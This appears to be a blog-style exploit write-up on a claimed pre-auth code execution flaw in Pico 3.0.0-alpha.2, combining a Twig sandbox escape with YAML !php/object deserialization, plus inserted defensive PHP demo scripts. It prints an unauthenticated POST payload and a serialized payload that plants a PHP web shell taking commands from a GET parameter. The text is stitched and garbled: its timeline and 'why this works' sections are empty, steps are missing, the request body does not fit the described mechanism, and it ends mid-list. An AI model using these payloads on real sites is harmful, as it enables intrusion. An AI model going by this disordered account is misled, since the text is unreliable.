Pico 3.0.0-alpha.2 Exploit

Breaking Down the Pico 3.0.0-alpha.2 Exploit: A Deep Dive into the Pre-Auth Remote Code Execution

Published: April 21, 2026 Author: Security Research Team

The Ethical Disclosure Timeline

To understand how this exploit evolved, review the timeline:

Phase 2: Twig Sandbox Escape (The Core Exploit)

In a hardened Pico installation, theme templates run inside the Twig sandbox. Its SecurityPolicy is an allow-list, not a blacklist: any tag, filter, function, method or property that is not explicitly listed is refused, which is what stops the classic _self.env.registerUndefinedFilterCallback("exec") escape. In alpha.2 that allow-list was too permissive: it still admitted filters such as map that accept a PHP callable by name, and that is the gap the payload below drives through.
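The allow-list behaviour described above, as an added example that is not Pico's or Twig's own code: a PHP script that sandboxes every template through Twig's SecurityPolicy and feeds it the map('system') payload once under a permissive policy and once under a strict one. The Composer autoload path, the buildSandboxedTwig and renderUntrusted helpers and the sample payload are assumptions made for the demonstration.

```php
<?php
// Added example, not Pico's or Twig's own code. Assumes twig/twig (2.x or 3.x)
// is installed with Composer; the autoload path below is an assumption.
require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Error\Error as TwigError;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityPolicy;

// Twig's SecurityPolicy is an allow-list: anything not named here is refused.
// The second SandboxExtension argument (true) puts every template in the
// sandbox, not only those wrapped in {% sandbox %}.
function buildSandboxedTwig(array $allowedFilters): Environment
{
    $policy = new SecurityPolicy(
        ['if', 'for', 'set'],   // allowed tags
        $allowedFilters,        // allowed filters
        [],                     // allowed methods: none
        [],                     // allowed properties: none
        []                      // allowed functions: none
    );
    $twig = new Environment(new ArrayLoader([]), ['autoescape' => 'html']);
    $twig->addExtension(new SandboxExtension($policy, true));
    return $twig;
}

// Compile and render an untrusted template string, reporting a refusal
// (sandbox SecurityError or a filter's RuntimeError) instead of letting it propagate.
function renderUntrusted(Environment $twig, string $template): string
{
    try {
        return 'rendered: ' . $twig->createTemplate($template)->render([]);
    } catch (TwigError $e) {
        return 'blocked (' . get_class($e) . '): ' . $e->getMessage();
    }
}

// Constructed attacker input (the page's map('system') payload written as a
// Twig expression): map is handed a PHP function *name* instead of an arrow
// function. Twig versions before 3.3.8 / 2.14.11 (CVE-2022-23614) called that
// name directly, so a policy that merely allows "map" is already escaped.
$payload = "{{ ['id']|map('system') }}";

// Permissive policy, the situation the text describes: map is on the list.
// On a vulnerable Twig the system('id') call runs during render(); on a
// patched Twig the filter refuses a non-Closure argument in sandbox mode.
$loose = buildSandboxedTwig(['escape', 'upper', 'map']);
echo renderUntrusted($loose, $payload), PHP_EOL;

// Hardened policy: the callable-taking filters (map, filter, reduce, sort) are
// simply not listed, so the sandbox check at the top of the compiled template
// refuses it before any callback is resolved, whatever Twig version is installed.
$strict = buildSandboxedTwig(['escape', 'upper']);
echo renderUntrusted($strict, $payload), PHP_EOL;
```

Run it with php from the project root; the second line reports that the map filter is not allowed. Pinning Twig at or above the fixed release closes the string-callable path, but trimming the allow-list is what protects a theme regardless of which Twig a given Pico build ships with.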

The Exploit Payload: An attacker submits a crafted HTTP POST request to the theme preview endpoint (which does not require authentication in alpha builds):

POST /?action=preview_theme HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

theme_template=shell&content=map('system')

Why this works:

The Vulnerability: Where Theory Meets Reality

The root cause is the interaction of two features introduced in the alpha branch: Twig template caching and YAML parameter parsing. The Twig side is what turns a template-preview request into code execution; the YAML side, through the !php/object tag, is what lets the attacker turn a one-off command into a file written to the web root.

Step 4: Full Shell

A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.

!php/object "O:1:\"S\":1:{s:4:\"exec\";s:63:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";}"

Once shell.php is written, the attacker has persistent access that no longer depends on the preview endpoint. Two caveats on this payload: the serialized object needs the braces around its property list and a byte-exact string length (63 for the file_put_contents call above) or unserialize() rejects it; and deserialization by itself executes nothing, so a class with an exec property only becomes a gadget when a magic method such as __destruct or __wakeup, or application code that reads the property, acts on it. The tag is also only honoured by Symfony's YAML component when the parser is invoked with the PARSE_OBJECT flag.
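The !php/object behaviour, as an added example that is not Pico's or Symfony's code: a PHP script that feeds front matter carrying the tag to symfony/yaml once with PARSE_OBJECT and once without it. The Composer autoload path, the FrontMatterGadget class and the constructed front matter are assumptions for the demonstration; the class stands in for whatever gadget an attacker would actually need on the target.

```php
<?php
// Added example, not Pico's or Symfony's code. Assumes symfony/yaml (>= 3.x)
// is installed with Composer; the autoload path below is an assumption.
require __DIR__ . '/vendor/autoload.php';

use Symfony\Component\Yaml\Exception\ParseException;
use Symfony\Component\Yaml\Yaml;

// Hypothetical gadget class for the demonstration. unserialize() on its own
// runs nothing; the restored object only becomes dangerous when a magic method
// such as __destruct acts on its properties. Here the destructor just records
// the property instead of executing it.
class FrontMatterGadget
{
    public string $exec = '';
    public static array $log = [];

    public function __destruct()
    {
        // A real gadget would pass $this->exec to eval(), system(), ...
        self::$log[] = $this->exec;
    }
}

// Constructed front matter with the same shape as the Step 4 payload, pointing
// at the demonstration class. Note the {...} around the property list and the
// byte-exact string length, both required for unserialize() to accept it.
$serialized  = 'O:17:"FrontMatterGadget":1:{s:4:"exec";s:7:"payload";}';
$frontMatter = "Title: Home\n"
             . "Description: !php/object \"" . str_replace('"', '\\"', $serialized) . "\"\n";

// Vulnerable configuration: PARSE_OBJECT makes the parser call unserialize()
// on the tag's payload, instantiating attacker-chosen classes.
function parseTrusting(string $yaml): array
{
    return Yaml::parse($yaml, Yaml::PARSE_OBJECT);
}

// Hardened configuration: without PARSE_OBJECT the tag is never deserialized.
// PARSE_EXCEPTION_ON_INVALID_TYPE turns the silent null into a ParseException
// so the attempt surfaces in logs rather than being swallowed.
function parseHardened(string $yaml): array
{
    return Yaml::parse($yaml, Yaml::PARSE_EXCEPTION_ON_INVALID_TYPE);
}

$meta = parseTrusting($frontMatter);
echo get_class($meta['Description']), " instantiated from front matter\n";
unset($meta);               // refcount drops to zero: __destruct fires here
echo 'gadget saw: ', implode(',', FrontMatterGadget::$log), "\n";

try {
    parseHardened($frontMatter);
} catch (ParseException $e) {
    echo 'hardened parser rejected the tag: ', $e->getMessage(), "\n";
}
```

Whether an installation is exposed comes down to the flags handed to the parser, so the first check in a deployment is whether PARSE_OBJECT, or a Parser configured with object support, appears anywhere on the path that parses page front matter.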

Real-World Impact Assessment

While Pico 3.0.0-alpha.2 is not designed for high-traffic public sites, the exploit has been observed in the wild targeting:

  1. Developer Staging Servers: Developers often expose alpha versions on public IPs for client demos. Attackers scan for /admin and specific X-Generator headers.
  2. Docker Containers: Many hobbyists pulled pico/pico:3.0.0-alpha.2 from Docker Hub because it was what the "latest" tag resolved to, and assumed that tag meant a stable release.
  3. CTF (Capture The Flag) Challenges: Ironically, this exploit is now a standard challenge in cybersecurity training, teaching students about insecure deserialization and sandbox escapes.

If successfully exploited, an attacker can: